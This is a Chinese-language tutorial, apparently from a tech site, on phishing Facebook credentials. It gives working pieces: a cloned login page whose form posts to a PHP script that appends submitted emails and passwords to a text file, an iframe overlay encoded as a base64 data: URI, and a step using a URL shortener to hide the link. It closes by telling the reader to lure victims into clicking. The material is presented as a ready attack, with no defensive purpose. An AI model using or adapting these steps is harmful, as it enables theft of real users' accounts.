如何利用iframe URI钓鱼

安全 应用安全
本文以盗取facebook登陆帐号的钓鱼为例,来示例如何钓鱼攻击的基本步骤。过程很简单,主要包括两个步骤,制作钓鱼页面,与钓鱼URI,其他网站的钓鱼页面也可以采取相似的方法,刚接触钓鱼的可以看看。

本文以盗取facebook登陆帐号的钓鱼为例,来示例如何钓鱼攻击的基本步骤。过程很简单,主要包括两个步骤,制作钓鱼页面,与钓鱼URI,其他网站的钓鱼页面也可以采取相似的方法,刚接触钓鱼的可以看看。

一、制作钓鱼页面

以盗取facebook登陆帐号的钓鱼为例,一共包含三个文件,index.html,login.php,password.txt

第一步:制作index.html登陆页面

首先,打开 https://www.facebook.com页面,查看源码,将源码copy到index.html文件中。

然后,编辑index.html文件,找到

<form id="login_form" action="https://www.facebook.com/login.php?login_attempt=1" 
method="post" onsubmit="return window.Event &amp;&amp; 
Event.__inlineSubmit &amp;&amp; Event.__inlineSubmit(this,event)">

将action的值改为

action=login.php?"https://www.facebook.com/login.php?login_attempt=1"

 

(login.php是用来盗取登陆帐号密码的)

将index.html放到web目录下(我的放置在/Library/WebServer/Documents/facebook目录下)

 

利用iframe URI钓鱼(以盗取facebook登陆帐号的钓鱼为例)

第二步:制作盗取facebook帐户和密码的脚本login.php

 

<?php
header ('Location: https://www.facebook.com ');//跳转到真实的facebook页面
$handle = fopen("password.txt", "a");//将假页面中提交的POST数据写入password.txt文件中foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");}
fwrite($handle, "===============\r\n");
fclose($handle);exit;?>

 第三步:创建接收POST数据的password.txt文件

dani-2:facebook leedani$ pwd /Library/WebServer/Documents/facebook
dani-2:facebook leedani$ sudo touch password.txt  
dani-2:facebook leedani$ sudo chmod a+w password.txt  

第四步:测试

登陆http://localhost/facebook/

输入电子邮件与密码,点击登陆

查看password.txt文件

dani-2:facebook leedani$ cat password.txt  

利用iframe URI钓鱼(以盗取facebook登陆帐号的钓鱼为例)

看,email与pass字段就是facebook的登陆帐号与密码。

二、制作钓鱼URI

一般钓鱼会采用iframe用钓鱼页面遮盖原始页面的方式来进行钓鱼,接下来的操作就是生成一个有这个功能的Data: URI,并将这个URI进行短地址转换

第一步:生成攻击代码

src就是你存放钓鱼网页的地址

<style> body {margin:0; overflow:hidden;}</style><iframe src="http://localhost/facebook/" height="100%" width="100%" border="no" 
frameBorder="0" scrolling="auto">iFrame Failed</iframe

第二步:将攻击代码转换为data: URI

登陆http://dopiaza.org/tools/datauri/index.php,将上面代码粘贴进去,

利用iframe URI钓鱼(以盗取facebook登陆帐号的钓鱼为例)

对应的data: URI

data:text/plain;charset=utf-8;base64,PHN0eWxlPiBib2R5IHttYXJnaW46MDsgb3ZlcmZsb3c6aGlkZGVuO308L3N0eWxlPg0KPGlmcmFtZSBzcmM9Imh0dHA6Ly9sb2NhbGhvc3QvZmFjZWJvb2svIiBoZWlnaHQ9IjEwMCUiIHdpZHRoPSIxMDAlIiBib3JkZXI9Im5vIiBmcmFtZUJvcmRlcj0iMCIgc2Nyb2xsaW5nPSJhdXRvIj5pRnJhbWUgRmFpbGVkPC9pZnJhbWU+

将上面的data: URI中的data:text/plain改成data:text/html

data:text/html;charset=utf-8;base64,PHN0eWxlPiBib2R5IHttYXJnaW46MDsgb3ZlcmZsb3c6aGlkZGVuO308L3N0eWxlPg0KPGlmcmFtZSBzcmM9Imh0dHA6Ly9sb2NhbGhvc3QvZmFjZWJvb2svIiBoZWlnaHQ9IjEwMCUiIHdpZHRoPSIxMDAlIiBib3JkZXI9Im5vIiBmcmFtZUJvcmRlcj0iMCIgc2Nyb2xsaW5nPSJhdXRvIj5pRnJhbWUgRmFpbGVkPC9pZnJhbWU+

访问修改后的Data URI,我们可以看到

利用iframe URI钓鱼(以盗取facebook登陆帐号的钓鱼为例)

点击facebook图标,或下面的url链接(浏览facebook.com),将跳转到我们在第一步中创建的facebook的假登陆页面 http://localhost/facebook/。

第三步:生成data: URI对应的短地址

很显然,这个URI太长了,会引起怀疑,在真实环境下,我们可以先进行短网址转换,例如http://tinyurl.com/就提供这个服务

利用iframe URI钓鱼(以盗取facebook登陆帐号的钓鱼为例)

最后,引诱受害者点击这个会连接到钓鱼网页的URI就可以盗取帐号密码了。

参考:http://www.hackingarticles.in/hack-email-or-facebook-password-using-iframe-uri-phishing/

责任编辑:蓝雨泪 来源: 碳基体
相关推荐

2009-01-04 09:57:24

2024-05-24 14:39:33

2015-06-15 11:45:55

2010-10-25 11:52:05

RSA身份认证总监在线欺诈

2024-01-05 08:58:36

2023-12-14 15:34:19

2017-01-20 15:34:10

2023-08-03 17:57:43

2024-03-11 16:03:59

2009-10-28 10:31:39

在线交易SSL证书

2014-09-11 15:04:13

2024-08-20 15:38:02

2011-07-05 14:22:19

2013-03-11 18:04:02

2020-02-04 09:02:02

新型冠状病毒网络钓鱼攻击

2021-08-29 21:58:58

钓鱼攻击微软SharePoint

2020-10-08 09:55:32

钓鱼邮件黑客网络钓鱼

2022-01-06 07:56:31

DMARC网络钓鱼攻击

2020-08-07 10:41:20

网络钓鱼网络攻击漏洞

2010-11-01 17:49:30

点赞
收藏

51CTO技术栈公众号